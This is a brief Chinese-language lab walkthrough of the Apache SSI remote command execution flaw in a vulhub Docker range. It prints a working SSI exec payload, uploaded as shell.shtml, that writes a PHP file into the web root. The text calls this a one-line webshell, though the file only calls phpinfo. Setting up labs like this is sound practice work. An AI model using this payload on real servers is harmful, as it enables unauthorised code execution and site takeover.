Apache SSI 远程命令执行漏洞

Apache SSI 远程命令执行漏洞

1.cd到ssi-rce

cd /opt/vulhub/httpd/ssi-rce/

2.执行docker-compose up -d

docker-compose up -d

3.查看靶场是否开启成功

?dooker ps

拉取成功了

4.访问url

这里已经执行成功了，注意这里需要加入/upload.php

5.写入一句话木马

<!--#exec cmd="echo '<?php phpinfo(); ?>' > /var/www/html/this.php" -->

6.提交查询

7.点击shell.shtml

8.查看是否写入成功

?docker exec -it ssi-rce_apache_1 /bin/bash

9.获取phpinfo